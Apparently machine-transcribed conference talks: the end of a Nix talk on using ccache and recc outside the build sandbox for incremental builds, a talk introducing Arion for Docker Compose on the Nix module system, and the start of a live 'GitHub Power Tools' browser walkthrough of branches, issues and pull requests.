is the path that we received, and this is what it looks like when it's been made content-addressable. So basically the whole closure has been rewritten, and the name of the path has been changed so that it matches the actual content of the path.
That's the meaning of content-addressable. Of course there is a problem, because the paths reference themselves, and you need to compute the hash on something, and that would never end. So basically you just remove self-references, compute the hash and then reinsert them, and so it's not perfect content addressing — it's content-addressed modulo self-references. What's interesting there is that, if everything is working correctly, this i3-ccache — the thing that I built — okay, it has a different hash, but if I make it content-addressable, then you see that you get the exact same hash here. And this means — and we can check that, but it doesn't make any sense, because it's the exact same store location — that if you try to diff these two things, you will see that there is no difference. Well, that's obvious, but you can try if you want. And of course, the one that remains to be tested is this recc-small, whatever. And that one should also give us the same output. Yes, that's working. Well, in this case you may not believe me because it was already in the cache before, but trust me, you don't want to wait five minutes just for that to build. So that's kind of the answer. We have broken everything. There is no sandbox at all, and we still manage to get the exact same output, right? So this sandbox is not totally needed. It's there to guard you against making mistakes. It avoids typical issues. It avoids the network if something is trying to use it and you don't want it to. But if you configure everything properly, then it should build the same outside of the sandbox or inside the sandbox. And in this case, you have different derivations, different contents before — and this is the image that was there in case there was some issue with the demo, but I guess you got the idea.
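The check being described can be sketched with the experimental command of that era (attribute names are from the demo; the command later became `nix store make-content-addressed` in released Nix, so treat the exact invocation as illustrative):

```shell
# Build the same package twice: once purely in the sandbox, once with
# ccache through the sandbox hole. The store paths differ, because the
# .drv files differ.
nix-build -A i3        -o result-pure
nix-build -A i3-ccache -o result-ccache \
  --option extra-sandbox-paths /var/cache/ccache

# Rewrite each closure to content-addressed store paths (experimental).
# If both builds produced the same bits modulo self-references, they
# land on the same content-addressed store path.
nix make-content-addressable -r ./result-pure
nix make-content-addressable -r ./result-ccache
```

Matching content-addressed paths are the evidence that the sandboxed and unsandboxed builds really agreed bit-for-bit, modulo self-references.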
So what we have now is a bit like before, but, well, you compile Firefox, it takes a lot of time, you see that it's making progress, you've done most of it, then the C++ is over and you enter the fixup phase. And then, oh, it doesn't work. But then you are not back to scratch, right? You can recover some of the work that has already been done. So that's better. So, a few messages. Well, this presentation is not about sending messages; it's more about challenging, so I would like to get feedback — if it gives you an idea, that's perfect — but the main message is that you can breach the sandbox, and it does not mean that you are doing something wrong, but, well, you should know what you are doing, mostly. It's really nice. And when I see that, I'm like, yeah, it's going to work. We can really get these incremental builds inside nixpkgs, and that's something that I really want. I think it would also be really useful to get fast CI answers. So if you make a pull request to nixpkgs, then you could get the answer within a few minutes and not a few hours. And it also means that we can trust other tools. recc is doing its best to make builds reproducible, hermetic and all of these nice properties. ccache is doing its best, but it's very old, so it doesn't know everything. And these tools are just C compiler abstractions, but they behave exactly the same — recc behaves exactly as Bazel does, for example. It's just that recc manages a single C compilation, while Bazel manages a set of files. From the outside, meaning from the Nix point of view, it's exactly the same: a tool that's trying to execute something remotely and get the result. So if we go that way, we could consider trusting Bazel, for example, to do things purely and correctly, and allow it to have access to a cache and a remote execution engine somewhere. So that's it for me. I have questions for you, if you don't have any. So think about it.
What about verifying these compiler cache implementations for reproducibility, so that they can really be trusted, and we're not just relying on a limited amount of experiments? Well, I guess that's always the same thing with reproducibility: you have to test it. And every time it's reproducible, that's good, but it's not a proof that it will never be irreproducible. So we can do that with these tools too. We can just start to include them and compile a few times, and then once in a while just make a perfectly hermetic sandbox build from scratch and see if we are still building the same thing. And that would give us more confidence that the tool is working correctly. I mean, maybe the problem is that when these tools were designed, there was no thought about such a thing as reproducibility. And it might depend on different things, like the system clock, for example. Well, truth is, I'm not aware of all the details of all of these tools. So that's something that we have to explore. It's like: look, it's feasible — does someone want to work with me on that? One idea came to my mind when you showed mounting the folder inside: did you try to mount a Unix socket? Maybe — I don't know ccache and sccache very well — but maybe you can get networking that way? I tried, and then I had no more time. So I think that theoretically it could work, but I don't know enough about all the technical details. From the outside it looks trivial, and then when you try to set up everything with the namespaces and stuff, well, it breaks easily. So that's something we can try tomorrow. If you think that it can be done in a few hours, then I would really like to try. Cheers. Hey, first I wanted to say I really appreciate this, because I've been many times in the situation where I wanted to package something large like Ceph, for example, while also iterating on bugs — building Ceph takes one hour. I had to build it over 80 times, so you can imagine that took a while.
So I really appreciate any effort going in that direction. Same thing with Haskell: when you work on GHC, for example, or iterate on a low-level library, rebuilds with nixpkgs can also take a very long time. So I think this is really good. I wanted to also point out another approach that is a little bit orthogonal to what you've presented, that we just discussed yesterday here at the table with, I think, edef and me, nh2, which was that you can also do the type of caching that ccache does — specifically for C things — at the syscall level. So we could, if we wanted to, ptrace the entire build and then see that if, let's say, an execve produces a certain output, we can cache that and then wrap any execve call that happens again to produce exactly the same output again. So that is, of course, somewhat in the further future, but that might be something that can be very generic across multiple things. I think practically I will first go with exactly this approach, because you have now shown that it works and it's great. And I just need to see how one can get the same thing for GHC Haskell, for example. But in the long term, that might be something that, if we agree on bringing enough hackiness into this thing as a kind of quick developer tool, we might do as well. Well, it's not really a question, but I still have two answers for you. It's funny, because I had the exact same discussion with NBP last year and the year before: well, we could do that at the syscall level, that would be fun. Truth is, it's not that easy. You have lots of cache entries, et cetera, so you need to be really, really efficient. It's a cool idea, but I'm not sure it will turn out as practical. But I'm always available to talk about that idea. Thank you.
This talk will present experiments at building packages incrementally by relying on an external cache outside the nix sandbox. We will show how tools such as distcc and bazel can benefit from impure information during the build, and discuss how this impacts purity and reproducibility.
10.5446/50687 (DOI)
is going to talk to us about some containers on NixOS and some Docker Compose goodness. All right, yeah, so this talk is about Arion. I'm Robert, I'm co-founder of Hercules Labs. We're actually at the launch of Hercules CI this week, so that also means I've been a bit busy, so I hope this presentation is sort of going to plan. All right, let's get started. So Arion — come on. Probably window focus. All right. It's a configuration language, so to speak, for Docker Compose. It's based on the NixOS module system, and it's also the tool that you can use to actually create the containers and restart them, that kind of thing. It's named after a horse. It's a divine horse from Greek mythology, and we chose the name because, well, obviously we have Greek mythology in the name of the company, and it's a very fast horse. I'll get to that. And it also has a bit of "Nix" in it, you could say. I thought it was appropriate. So yeah, the way this came to be is we were looking for a process manager kind of thing for our local development environments. We'd been using Supervisord for Cachix, but it had some problems with properly terminating processes, so we were looking for something else. I've worked with some tmux automation, but that was a bit too custom, and it's not really designed for this purpose. I looked into systemd, but that doesn't really support project-based stuff very well. NixOS containers — those are obviously very nice, but for project development, if you want to do stuff like live reloading, they were a bit, well, not flexible enough. You need to bind-mount stuff into the container, and maybe this has improved, I don't know; at least at the time, NixOS containers weren't a good option for this problem. So we considered Docker Compose. I guess I don't have to talk that much about Nix at this conference in terms of basic explaining. It's really nice to have a programming language for your configuration, and with Nix, we can use the module system, which is really nice.
So, yeah, the way we started to develop this sort of solution is to just try things out. So this is what I ran. Just docker run. It has the Nix store bind-mounted right into the container, so you don't have to rebuild everything or build images. And, yeah, you don't really need anything else, basically. Or at least as a starting point, you don't need much else in your container. We just wanted scratch, but that's not an option for some reason. So you put a passwd file in there with, like, root and nobody. That actually works. But, yeah, so we had to create the image. It was pretty clear that we needed something like Docker Compose to actually do this. It was already sort of the plan. So Docker Compose is a system that lets you define multi-container applications and perform operations on them, like building all the containers — building all the images, I should say — and starting them, destroying the deployment, all the kinds of things you expect from a deployment tool. And a basic configuration file looks like this. It's YAML. People might have opinions about it. The nice thing is it's a superset of JSON, so we can easily write these files from Nix. Yeah, so what you see here is a set of services. It's like a dictionary kind of thing. So this is a service name. This basically says look in the current directory for a Dockerfile, and it'll use the service name as the image name. This will expose port 5000 to the host, and there's an extra service for the back end. So Arion — it really started out as just a small bash script that did a thing for us. But with the module system, it's really easy to refactor, and it was quite fun to make it more of a self-contained thing. So as it grew, we open sourced it around December, I guess. Yeah, so I think we announced it, and since then, it grew from, I think it was 200 lines of bash code, into 317. That's not that bad. Actually, bash is a really nice language for this kind of thing.
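The YAML file being described is not reproduced in the transcript; a plausible reconstruction (service names and the back-end build path are made up, the Dockerfile build and port 5000 are as described) is:

```yaml
# Hypothetical docker-compose.yml matching the description:
# one service built from a Dockerfile in the current directory,
# exposing port 5000, plus a second service for the back end.
services:
  webserver:
    build: .            # look for ./Dockerfile; image named after the service
    ports:
      - "5000:5000"     # expose port 5000 to the host
  backend:
    build: ./backend    # illustrative extra service for the back end
```

Because YAML is a superset of JSON, Arion can generate such files directly from Nix by emitting JSON.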
But at some point, we were thinking of some features that would be hard to implement in bash. So we switched to Haskell. That did double the lines of code, but we think they're more maintainable lines, so in the end, that should be a good thing. But really, most of the project is Nix modules, and some support code, like tests, of course, that also add to the line count. All right, so demo time, always interesting. See if it works. All right, so this is inside the repo checkout. There's an examples directory. You should have a look at it. But I'll also show the basics. So these are — obviously, the result shouldn't be there. But there are arion-pkgs.nix and arion-compose.nix files. For the bootstrapping, Arion needs to find some version of nixpkgs. Often in projects, it's the case that you have a specific version of nixpkgs — I mean, this is before Flakes, right? So, yeah, you have some version of nixpkgs, probably some overlays that are specific to the project, and you want to use those in your deployment. So in this case, it's a very simple invocation of just nixpkgs with the system set to Linux. That's what you're deploying most of the time. And that's really just for bootstrapping and for providing the pkgs argument to the modules. And then we have the compose file. It looks quite a bit like NixOS. The NixOS module system is basically independent of NixOS, and you can do a lot of cool stuff with it; it doesn't have to be NixOS itself. So in this case, we did insert the pkgs just like you have on NixOS. But these are Docker Compose services. And so one of the nice things is the ability to share the host store, so you don't have to build images when you're coding. And yeah, I think this should be somewhat self-explanatory. It's a web server. And now you can start it with the up command. Yeah, so it's actually started. It doesn't produce much output. I've already built the thing.
So what happened behind the scenes is the NixOS, I should say probably the Nix module system was invoked to evaluate that configuration. It was built with Nix build to produce the Docker compose file, which has all the references to stuff like this path here for the Nix documentation. And that just makes it work. If I go to local host, 8000. My browser is a bit shy. It turns out. That should do. There it is. All right. So this is a fairly, as it says, it's the minimal example. This is just using Nix and Docker compose. But we also put some effort to support NixOS on this. I'll stop this deployment. It's actually called a project in Docker compose terminology. And I on its composition project is a bit overloaded. All right. So it's still services is still an area level service. It corresponds to a Docker compose service. But we have some extra fields here provided by one of the area modules, which takes care of the NixOS integration. So everything below the NixOS configuration is passed into the NixOS module system and evaluated there. And this automatically sets the service command field to the system D or in its invocation for NixOS. And it configures the Docker with the right settings. Took a bit of research to get it to work. But there you go, I think. Name service, gosh, didn't start well. I don't think we need that. Sorry? And it works again. It's basically the same thing. But now it's running with much more stuff around it to clean up slash that kind of thing that most containers don't need. But if you need it, it's really nice to have it, I guess. Yeah, so that's the basic thing. Yeah, so there's lots of nice things you can do for development. For example, we're using bind mounts to do live reloading or hot reloading of our services, which makes for a nice development experience for a quick iteration loop. So I thought it would be nice to talk about the module system. I think it's really cool. 
It's a really nice way to work with a certain type of complexity, so to speak. It's the kind of thing you see in NixOS. But it also really applies nicely to, well, to Aion, of course. And I think there's lots of applications that benefit from the module system. For example, I think there's a talk from IOHK about the Haskell.Nix alternative Haskell infrastructure. I think that's using the module system. And I really like it. Okay, so one of the basic things you need to know about the module system is that there's basically no difference between your configuration and other modules that are usually provided by, say, NixOS or Aion in this case. So I think this is really an important feature because it lets you factor things out into separate modules and actually take advantage of having a programming language as your configuration language. Yeah, so this is what a basic invocation of the module system looks like. It's a bit of a contrived example, but I'll walk you through it. Suppose you have a call of Nix packages. All you need to do is call lib.eval modules. And by the way, if you don't have Nix packages itself, you can directly import the lib directory, so you don't have to choose even a system architecture in advance. But if you do have Nix packages, you can take it from here. And you just invoke it. You tell it where the modules are. And you get back an attribute set with config in it. It's the same config that you get passed into the modules. So this lets you use the config in whatever context you have. Yeah, you always have the lib argument pass to it that's built into the module system. Also, options lets you do introspection into which options are available. Packages is actually a bit of a lie. That one is not built into the module system itself. So if you want to have it, you actually need to declare it as an option. You should probably have put that on the slide. Well, ask me after the talk. Yeah, and so this should be, I guess, more familiar. 
The config prefix here is optional. So if you're not declaring options, config, or imports, but just foo is whatever, that actually means config.foo. And these values are then combined with the other modules in the configuration. And so, for example, here, bar should probably define config.bar to some value, and it's made available here. But this module is also free to declare its own config.bar. And if there's two definitions, in the module system, you can have a merge function that combines the two values. So this config will always have the combined values from all the modules together. There's some sort of fancy things you can do. Ariane relies on submodules. Basically, whenever you see angle brackets name in the NixOS documentation, that means that's a submodule, and in NixOS, usually, they're just data, so to speak. But that's not necessary. You can actually do anything you like in these modules. They're proper modules. So in Ariane, I didn't really expect this because I was more familiar with the way it was used in NixOS, but I didn't really look into it that much yet. So it was only recently that I refactored it into proper submodules, so you don't have to manually call the module system for each of the services. It's just a type that says services are submodules, these modules. So that's really nice, and you can actually do stuff like imports in this sort of sub tree of the composition. And that means that this file will be evaluated, and it can only set things for services.web itself. It's in its own namespace. This is something we figured out. The module system relies heavily on lazy evaluation to make things work, because obviously when you're declaring the config, but you're also getting it back as an argument merged with other things, that's recursion going on there. Because of laziness, it can actually work. But I used to be quite wary of it. 
I've run into situations where there was an infinite loop due to the way things are structured in the module system. So it's nice to discover that some things, some of the more fancy things actually do work. Because normally when you So when you declare the configuration, the structure of that attribute set should not depend on the configuration directly. It's kind of mind-bending, but that's what it is. So it turns out you don't actually need to do that all the time. In some cases, you can, for example, look at options instead, which is available sort of earlier in the recursion. And you can use it to check whether some options are available. We've used it, for example, to provide a better NixOps integration in the Hercules CI agent. If you just declare NixOps specific stuff in NixOS, you'll be declaring values that are undefined. There's no deployment namespace in NixOS, so that's an error. So with this sort of pattern, you can make this optional. And I think this will be very useful if we sort of decentralize NixOS, which I think is a really good idea. And with Flix, it actually becomes feasible to do so. You can use this to detect whether something is available or not, provide a better experience when people have some combinations of modules in their configuration. Yeah, so like I mentioned, the submodules are proper modules, so you can actually use them to do computations on your configuration. So for example, in Arian, we have the service.environment variable, which has all the environment variables for the service. And it needs a tiny bit of processing, almost no processing at all, actually. But this is actually declared in the service level modules. So usually in NixOps, you see that there's some computation that maps over all the modules. But you can actually move some of this computation into the module itself, and that cleans up the code nicely. So in Arian, each service is responsible for its own piece of the YAML file. 
One thing I noticed is lists can be annoying to work with. In particular, we've worked with the capabilities in Docker Compose. So with Docker, you can use Linux capabilities. There are basically ways to restrict the security context of a container. So we can disallow stuff or allow stuff. There's a default set of capabilities that a container has. And Docker Compose lets you modify that set so you can remove things from it. You can add things to it. And so the obvious thing to do is model these fields as lists of strings. But that's a bit annoying if you have a service that splits into modules, because combining those lists is not very obvious. What do you do if one of the modules says this capability should be removed and the other modules says it should be added? So changing that to an attribute set makes it much easier because then the module system takes care of this. The module system lets you use priorities to override lower priority definitions. So this makes for a nicer interface. Yeah, and while developing the system, yeah, I noticed that it's when you're constructing a new system, it's best to start with the low-level stuff and then whenever you need something on top of that, you can do it in a separate module. So I really recommend to do so. It's easy to add things to a new module, but that can turn into a mess. Yeah, so in the future we'll be looking at integrating better with Flix as they evolve. We're going to improve the image support and we're looking into caching the evaluation to improve performance for commands that don't need to rebuild. And we're thinking about how to deal with more distributed applications of the module system. And one example of a sort of an experiment we're doing is project.nix. It's really not ready for prime time, but basically the goal is to standardize the glue code that you find in many projects. Like how do you overwrite the Haskell packages or all those kind of things. 
It's nice to have options that have a nice definition and can be reused in language integrations. Thank you. Any questions? So I'm not sure if you touched that in the introduction because I wasn't here, but how would you put that into production? Of course you have a Docker compose setup, but is this Docker compose YAML like distributable so you can use stuff like Docker stack to put that into production? Right, so we don't have a complete deployment story yet because we're not using this for production services. So that's kind of a question. We also have Docker compose is a frontend to both Docker itself and Docker swarm. So at least in theory it should be easy to actually do a swarm deployment using this. So that's a way to go I guess. And the way you wire it up into your deployments, I think that really depends on the technology that you're using. So yeah, can't say much about the specific of that. But it's definitely feasible. I think it's not a good idea to use the host store on a production deployment. It's better to use the image support that's built into this. We haven't used it with the registry yet. We've only used Docker load. So I don't expect any problems with pushing to registry, but we just haven't done it yet. So my understanding is that we need some kind of frontend and NICS expressions to describe how we create a cluster of containers with services or systems with services and then some back end to generate the YAML file. I haven't used it too much, but my understanding is that NICS ops has some representation for describing such a cluster and then various back ends. Did you consider adding a back end to NICS ops to generate Docker compose YAML files? Not really, to be honest. And I think it's been worthwhile to take another approach. There's some overlap between features that are provided by NICS ops and Docker compose. So Docker compose basically has all the state in Docker, whereas NICS ops needs an extra state database. 
So it's actually nice to avoid that complexity. Yeah, I think something similar can be done for NICS ops, but it's probably best to take a different approach there because it's just structured a bit differently. Hey, what is the story about garbage collection routes and how much space will it occupy and how to clean up? Great question. Currently it's using a temporary garbage collection route for the duration of the command. So when you run Docker up without any other arguments, that's sufficient because it's only running as long as the Docker up command is running, but when you're using detach, the command will terminate while the deployment is still up. So in that case, you technically have a risk of garbage collecting a live deployment. That's not great. For our purposes, this has not been a problem, but if you deploy, I think that's one of the main reasons to go with images rather than using a host store. The images will not be garbage collected. Yeah, that's that. I think I mentioned evaluation cache. I think it's a good idea to change Arion a bit to be more aware of where things are deployed so we can both create a garbage route for that deployment on the user system and reuse the YAML file to speed up commands like Arion logs, for example, so that it doesn't have to reevaluate the entire deployment either. So that will also improve the garbage collection situation. Okay, so if that's all the questions, okay, one more from the man before lunch. Yes, I just wanted to, well, it's not a question, it's an answer for friends. So what we are deploying to Amazon and what Arion gives us is that we can share the module system between what Amazon runs and what runs in the Docker. And that's the biggest addition here, because the Docker is just, well, runtime protection system in that case, and it takes care of port sharing and all of that. But we are essentially running the same kind of process and the same kind of configuration as on the machine stand. 
And that's a nice thing of reusing the module system. Yeah, so, yeah, that's it. Thanks. Thank you, Robert. And thank you.
An introduction to Arion: learn why we built it on top of Docker Compose, how it integrates with Nix and how you can use it. As Arion is mostly an application of the Nix modules system, we share our experience of building it. Arion is a tool that integrates Nix and NixOS into Docker Compose. - introduction to Docker Compose and Arion - how to write a deployment - how Arion uses the Nix module system to its advantage - what's next for Arion Arion started out as a little bash script with the goal of doing process management for our local development setups internally for Hercules CI, on top of Docker Compose. It has since grown to become an independent tool with support for NixOS in Docker, a significant subset of docker-compose.yaml and support for building actual images. Arion is written with the Nix module system, which means that deployments are as powerful as Arion's internals and that you can build your own abstractions into your deployments. It also means that the format of its logic may be familiar and it's easy to contribute.
10.5446/50643 (DOI)
All right, welcome. Hello. Welcome to GitHub Power Tools. As you can tell, that's where we are. This talk has no slides. We're just going to do things together. I might leave a repository that has some notes in it at the end or something like that, but otherwise, take notes. You'll probably have some opportunity to interact a little bit through a repo if you want. If you've got a laptop, as you've noticed, the Wi-Fi here is amazing, so you shouldn't have any trouble getting on GitHub and working here. If you happen to be staying across the street at the Radisson, you know that Wi-Fi isn't always amazing. So it's nice to be here. Everybody enjoying the show so far? Good. All right. Next question. Who is using GitHub right now? Almost everybody. Who is not using GitHub right now? Don't be shy. It's okay. We can still be friends. All right, cool. Well, what I hope to show you today is a few features in GitHub that you don't already know. Some of this stuff you might know. I've given this talk before and I've had some people say, well, gee, those aren't Power Tools, that's our normal workflow, so maybe you have a sophisticated workflow. I think everybody's going to pick up at least a few tips. And hopefully, really by the end of this session, you should have kind of the core set of features down that I think are really important features for you to be working with. We'll be doing most of our work in the browser. I'll downshift to the command line a little bit. We'll look at things from command line git, probably, that'll make sense. But really, let's dive in and let me show you what I'd like to do. Now, I am going to do this all in GitHub. And so we'll call this NDC Oslo 2014. That's the name of our repository. That's going to be a public repository. So all of you will be able to see this. The whole internet will be able to see this. And with that, yeah, good enough. I'm just going to create that repo and we're done. So there. We're going to create a repository now. 
And this is not a path you go through all that often. I wouldn't quite call this a power tool. This is kind of preparatory stuff. But still, you don't create new repos. Most of us don't create new repos all that much. You jump into a project that's already there. So this is a somewhat unfamiliar path. And because it's an unfamiliar path, GitHub gives you lots of help there to show you what's up. What I'm going to do is I kind of have to jump ahead a little bit because I'm going to use the built-in issue tracker to keep track of our agenda. So issue tracker is a thing on our agenda. But I have to use it to build the agenda. So let's go ahead in here. I am creating a new issue. And this will be our topics for the session right here. And what should we do? Well, I'd like to cover pull requests. I think that's really important. I want to talk about forking. Make sure everybody's very clear on what forking is versus what branching is. We should cover issues. I used to teach people how to use GitHub for a living. And when I did that and we'd get into the issue tracker, the most frequent thing I heard was, oh, it has an issue tracker? Like, yes, it has an issue tracker. And it's pretty nice. It's very simple, very lightweight. But you can do some nice things with it. So we'll talk about issues. We'll talk about animated GIFs. That's a very important feature. There's no way we could really survive without that. GitHub pages. There's also built-in website hosting for free with every public repository. My blog, timberglenn.com, gets about one post every six months. So it's not exactly a heavily trafficked blog, but that's hosted on GitHub pages. So I don't pay anybody web hosting for that. That's just public repo on GitHub. GitHub pages and maybe some prose composition tools. We'll take a little bit of a look at how to use GitHub for non-code things. There's a whole lot of work that you can do. Oh, wait, I forgot something. The so-called web flow, we need that. 
There's a whole lot of work you can do in GitHub. That has nothing to do with code. Now, most of the time, you're going to want your artifacts to be text files, but a lot of knowledge gets created and collaborated on in forms that could be done as text files. So we'll take a look at some prose composition tools and ways even so-called non-technical or non-coding people can use GitHub to work together. So there we are. Anybody else? Any requests? Something else you want to see? No. All right, we should come up with one. Let me know. I maybe can't hear you. I certainly can't see you. All I see are two bright lights. As far as I know, I am about to be abducted by UFO, and there are no other human beings in the room. But what's that? Rebasing. OK, rebasing is more of a get thing. And so if time goes well, if I don't talk too much, that's unlikely, frankly. We'll talk about rebasing. That is a great feature. It's more of a core get thing. So might not get to that there. But there we are. There are our topics. So you notice that I was using Markdown, the Markdown syntax, which I'll come back to. And it's rendered for me now. I've got that nice big topics for the session, heading and a bulleted list. And I have a collaborator already. I want to see more of this. This D-Gram guy, whoever he is, I like him. All right, so if you want to jump in on anything I'm doing, any pull request, any issue, if you know how, if you've got a laptop, do it. Now, David has sent me a coded message. The squirrel wearing the fedora. What does that mean? Well, let me mouse over. He's trying to say get to work. This is kind of an inside GitHub joke. That squirrel to them means ship it. So let's go ahead and ship it. All right, let's go back here. This is in the issue tab here. I'm going to click on the code tab and go back to this view. Now, this is an empty repository. There's not a lot I can do. 
Normally, I would be cloning this down on my computer and using Visual Studio or a text editor or an IDE of some kind to work down there. But again, we're going to stick to the web flow here. So I'm going to follow GitHub's directions. It says, every directory should include a readme. Well, I click on readme and suddenly I'm in a text editor. I'm editing a file called readme.md. So let's go ahead and do this. And this will be the NDC Oslo GitHub Power Tools, various cool GitHub features, jokes, squirrels. And probably, I will not be able to stop some American slang happening. It just comes out. So stop me before I kill again. There we are. So now I have created the readme and I can commit that file. When I do that, I'm back to this is like the normal, familiar GitHub view. You guys are all GitHub users. We're finally looking at the code view, which makes a little bit more sense. One thing, any file called readme, that's a magic word in GitHub. And it's going to be rendered on the project page. And people can get quite elaborate with their readmes. You can put in there, in this case, it's a markdown file. You can use the markdown syntax to embed images and have highlighted syntax, highlighted code, and all these cool things. And I'll probably do some of those as we move along. That lets you put a fairly substantial project home page in your readme. If it's an open source thing or if it's a thing inside your company, this should give people an idea what the project is, how to get it, how to build it, how to use it. If it's an API, a code sample, if it's a tool, how to run it, you can put all that stuff in the readme. That's not what I want, though. I want to type in some poems. So I need to create a new file. Let's think about this, though. Let me go back to my agenda. I'm going to open that agenda in a new tab. Here's my Power Tools agenda. Webflow, webflow. OK. What are some things I could do? Now, I want to modify this repository. And most of you are GitHub users. 
So you know that if I'm going to do work, I should probably do the work in a branch. Probably don't just commit right against master. Now, there are times when committing against master is an entirely appropriate thing to do. I'm going to say, for the purposes of argument, today is not that day. I'm not going to commit against master. I'm going to make a branch. The good news is I can do that from the browser. Now, again, maybe you're doing this from inside the Visual Studio integration. Maybe you're doing it from the command line. There are people you work with who might be able to make GitHub work for them if they can do things through the browser. This is really important to some people. So I'm going to do this branch. And I'm going to call this branch Strange Ascetic. That's the name of the poem we're going to use today. Type that in. I create the branch. And I am now on that branch. It says right there, you're on the branch, Strange Ascetic. I can switch between the branches with that select box in a way that you'd expect. It's good. I've made a branch. Now, I will create a file. So to do that, right up here on this line, that plus there, when I click on that, I'm back in the text editor, creating a new file. I can even create directories. Let's say I want a directory called Poems. I'll say poems slash. And it says, oh, you must mean directory. And I'll call this ascetic.text. And we'll give it a title, the song of the Strange Ascetic. And we'll give a couple lines in there. Purple Vine. Slaves should dig the vineyard. I would drink the wine. OK. We have added that new file. Get started on some Chesterton, because why not? There we go. So I've got that new file. I can go back and look at the overall code view. Now GitHub has noticed, says, hey, you've got a new branch. It puts this line in right here. It says, do you want to create a pull request on that branch? I'm going to say not yet. OK, let's not do that yet. I want to make sure we know what we're doing. 
And I don't know if you ever use the web UI to check out what's going on in a project. You can get a very simple log view. I just clicked on where it said Commits. And now I can kind of see the commits that I've done. I can go browse the code for each one of those. So this helps right now, for example, in my role at Datastacks where I work, there's kind of a writing project I'm overseeing. It'll be a cool thing. It'll be available to the public in a few months. And I've got a non-technical manager who's interested in the progress of that writing project. Well, I can send that person to this page and say, hey, go take a look at these commits here. You can see who's writing, who's getting their work done, crack the whip, whatever it is that has to happen. There's nice non-technical uses there. All right, let me go in and throw one more commit in there. Higgins is a heathen. His slaves grow lean and gray. That he should drink some tepid milk exactly twice a day. Sounds very British. All right, good deal. Now, let's say I would like to ship that work. Let me go back to the browser. All right, all right. I just happened to notice something here. I'm looking at the screen at the page, and I see there is a pull request open on this repository. So you guys are doing what I asked you to do. Now, there are people in the room who don't know what pull requests are yet. I'm sure of it. I'm not going to take a poll. But I'm going to do a pull request first, and then whatever intrepid souls submitted that pull request. I will look at it. I'm not going to say I'll merge it yet, because I don't know what's in it. We'll find out. I'm going to make my own pull request first. So anybody else who wants to make trouble like that, I don't know who did this, but they're doing the right thing. If you want to do more of that, please bring it on. That's just going to make this more fun the more people get involved. 
All right, this is a little bit contrived, because this repo belongs to me, and I'm the only one who can write to it. And so I'm branching, and now I'm going to go through this very careful process of how I merge that branch. In the real world, sometimes I will use Git for things that are just me and me alone, like a zero collaboration project. I'm just collaborating with myself. And using Git and using GitHub can still be useful. I typically do not branch in those scenarios, because there's often not a lot of doubt about whether I want the work that I'm doing. But branching, you're going to see this in a minute as I do this pull request. A branch isn't just a way to separate work or to indicate that work is experimental. It's nice. If I'm working on a project by myself, I might say, well, I don't know how this is going to work out. Let me branch, and if it doesn't go well, I'll just roll back, and I'll delete the branch and forget about it. A branch is fundamentally in GitHub a place to have a conversation. It is not fundamentally a place to experiment. I mean, it is a place to experiment. That's true. But the most basic reason for a branch is that it's saying, this work, this stuff, I want to talk about this. So let me do that. I have created this branch called Strange Ascetic, and I'm going to take the bait and click on that button that says compare and pull request. I click to the button, and GitHub has done some stuff for me, and I need to point some things out on the screen. If you've ever done this before, this is really confusing. But right at the top, right there, it says, you've got this branch. That's that little symbol there. This branch called Strange Ascetic, and dot, dot, dot. The implication is it's coming from over here, flowing to here, going into the wrong direction. Sorry. Going from Strange Ascetic, and it's going to get merged into master. It's like those three dots there that should almost be an arrow that points into master. 
That's really what that means. We're considering merging Strange Ascetic into master. For my pull request, I gave it a subject, and I gave it a body. In real life, when you submit these, you do want the subject to be meaningful. You want someone to be able to look at that and get an idea what the PR is about. And if you want more detail explaining your work, like if you're submitting a PR to an open source project, you might want that description there to be like the body of a short email. And I have options in here. You saw I typed colon. So far, that's just text. And I typed colon, and I get this little pop-up. Well, now I am in the world of emoji. And on GitHub, emoji is a very important means of communication. I don't know how people get by without emoji. I don't know what life was like three years ago before it was a thing. So I type colon, and then I can type the name of an emoji character, and the list kind of narrows down. I'm going to go with sparkles. That's pretty conventional. And maybe metal. I mean, I'm in Norway, right? So some metal. And if I want to know what that looks like, I can hit that Preview tab, and I preview it. Emoji is there, and really, in general, this link right here. If I click that, I get a Help tab that opens up. And remember how I was saying how the Wi-Fi is great? There we are. OK. I get this awesome Help page that tells me all about this little markup language called GitHub-flavored markdown. What I'll do is I'm just going to do some markdown things as the talk proceeds. I might not stop and explain each one. But when you see me do something that doesn't look like plain text, that's because it's GitHub-flavored markdown. All that stuff is documented in here. It's good stuff. And we'll leave it there. So I have now created a pull request. And remember what that pull request means. That pull request means I want to talk about this. It might also signal that I'm done. 
And that's often the open source mode, when there's this thing out on GitHub and you need to fix a bug. Then you fork it. We'll talk about forking a little bit. You make your changes, and you submit a pull request with a complete bug fix. And the meaning of that is basically you're saying, here I made this for you. Please take it. Fundamentally, you're saying, I'd like to talk about this. And you can even open a pull request before the work is done, like I have here, if you want the conversation to go on. All right. So it looks like I have some collaborators. And this is good. This dgram guy has given me an animated GIF. And let's see. Aha! JEP 13 has legitimately pointed out a bug. Thank you. I'm going to wait on that. I appreciate the collaboration. But I have an agenda here. And I'm going to show you something else in a little bit. I'm going to wait on that. But let me show you how he or she, I don't know who this person is, this person, did that. Over here in the files changed tab, I'm actually able to make line by line comments on all this. Now, this clearly should read, if I had been a heathen. And that's where the bug is. So what JEP 13 did was just mouse over to there, click on the little balloon. And I just had a little conversation with this person. I possibly have never even met online with emoji in there. So that's important. And as if we're doing a little bit of code review. I love it. Life isn't over. The work isn't over just because I submitted the pull request. I can keep working on that branch. And any commit I make to that branch is going to show up in this pull request. I'll prove that to you this way. Here, let's go back here. And actually, what I'd like to do, if you don't mind, is I'm going to figure out how the clipboard works. There it is. Hey, it's GitHub Power Tools. It's not clipboard Power Tools. So I've got a copy down here. I could do some work on that branch right here. In fact, I'm going to do that. 
